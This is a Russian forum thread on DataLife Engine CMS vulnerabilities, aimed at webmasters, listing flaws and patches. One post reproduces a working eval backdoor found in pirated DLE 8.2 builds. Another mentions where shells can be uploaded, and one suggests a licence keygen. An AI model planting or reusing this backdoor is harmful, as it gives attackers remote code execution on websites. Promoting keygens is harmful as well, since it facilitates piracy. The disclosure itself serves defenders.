![]() |
|
|
Инструкции, модификации и статьи для DLE Сборник инструкции, модов и статей по движку DataLife Engine |
![]() |
|
Опции темы | Поиск в этой теме |
![]() |
#1 | |||
Коварный тип
![]() ![]()
|
![]() Я думаю что вопрос безопасности в скрипте DLE довольно актуален, т.к. движок имеет очень широкое распространение. Тема создана для вэб -мастеров, а не для засрацев, которые используют чужие ошибки.
|
|||
![]() |
Cказали cпасибо: |
![]() |
#2 | ||||
Коварный тип
![]() ![]()
|
![]() Уязвимость DataLife Engine 8.2
Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля. Степень опасности: Очень высокая Злоумышленник может получить логин и пароль через модуль восстановления пароля. Как получают пароль:
Для решения проблемы администраторам рекомендуется обновить скрипт до 8.3. Следует так же учесть что в версии 8.3 изменяются некоторые шаблоны. Все изменения в удобном виде можно просмотреть на официальном сайте ВОТ ТУТ. Для тех кто не хочет обновлять версию скрипта официальный производитель предлагает скачать патч. Скачать его можно ВОТ ТУТ или из вложения к этому сообщению. |
||||
![]() |
![]() |
#3 | |||
Web Master
![]() ![]()
|
![]() DLE 8.2 нулл от мид-тим весь в дырках..
1) Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля. Ошибка в версии: только 8.2, версии ниже 8.2, а также актуальная версия 8.3 данной уязвимости не подвержены Степень опасности: Очень высокая Замените файл => dle82_path.zip 2) На днях появилась информация, что нуленные движки (скачанные c dle.in.ua, с других хз) dle8.2 содержат бэкдор в файле engine/ajax/updates.php eval() через $_POST. Код:
if($_GET['wert']==''){ require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; $config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; @header("HTTP/1.0 200 OK"); @header("HTTP/1.1 200 OK"); @header("Cache-Control: no-cache, must-revalidate, max-age=0"); @header("Expires: 0"); @header("Pragma: no-cache"); @header("Content-type: text/css; charset=".$config['charset']); $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']); if (!strlen($data)) echo $lang['no_update']; else echo $data; }else{ $file=(ROOT_DIR."/engine/classes/mysql.class.php"); if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";} $file=(ROOT_DIR."/engine/data/dbconfig.php"); if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";} $file=(ROOT_DIR."/engine/data/config.php"); if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";} eval(base64_decode($_GET['user_id'])); echo <<<HTML <HTML><body><form action="" method="post"> <center><textarea name="text" rows="10" cols="100"></textarea> <br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML> HTML; if($_POST['text']!=''){eval(stripcslashes($_POST['text'])); }} |
|||
![]() |
![]() |
#4 | ||||
Fedoraвод
![]() ![]()
|
![]() Эх серега, такую дырку спалил, яж те по секрету, а ты всему свету (шутка конечно)
Но есть у меня еще парочка секретов, так что, не советую серьёзные проекты хостить на дле, уж слишком много в них дырок. Serberg: Да уж, секрет ))) Просто внимания на эту писанину не обратил, пока не увидел что у меня та же ботва ). Естати, вот еще набор уязвимостей:
|
||||
Последний раз редактировалось Serberg; 16.11.2009 в 16:26.. |
|||||
![]() |
Cказали cпасибо: |
![]() |
#5 | |||
.:V.I.P.:.
![]() ![]()
|
![]() Как вариант взять лицензионный скрипт DLE, мне дал его один знакомый. А ключ с генерируете генератором ключей.
![]() ![]() ![]() Скачать |
|||
Последний раз редактировалось Serberg; 16.11.2009 в 16:30.. |
||||
![]() |
Cказали cпасибо: |
![]() |
#6 | |||
Новичок
![]() ![]()
|
![]() Даже если "плохому дяде" удастся получить доступ к админке, шелл залить не получится, т.к. в папке загрузки файлов лежит .htaccess который не даёт работать php(и не только). Шелл получится залить если установлен DLE Forum. Это так, для заметки.
|
|||
![]() |
Cказали cпасибо: |
![]() |
#7 | |||
::.V.I.P.::
![]() ![]()
|
![]() Недостаточная фильтрация входящих данных
Ошибка в версии: 9.0 и все более ранние версии Степень опасности: Высокая Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите: PHP код:
PHP код:
PHP код:
PHP код:
Источник: dle-news.ru |
|||
Последний раз редактировалось Serberg; 16.02.2011 в 19:44.. |
||||
![]() |
![]() |
#8 | |||
Коварный тип
![]() ![]()
|
![]() Недостаточная фильтрация входящих данных
Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта. Ошибка в версии: 7.x - 8.5 Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте) Для исправления откройте файл engine/inc/files.php и найдите: PHP код:
PHP код:
PHP код:
PHP код:
|
|||
![]() |
![]() |
Метки |
shell dle, дыры в dle, уязвимости |
Опции темы | Поиск в этой теме |
|
|
![]() |
||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Уязвимости форумов Vbulletin | shadowvlad | vBulletin 3.х | 2 | 26.02.2009 14:17 |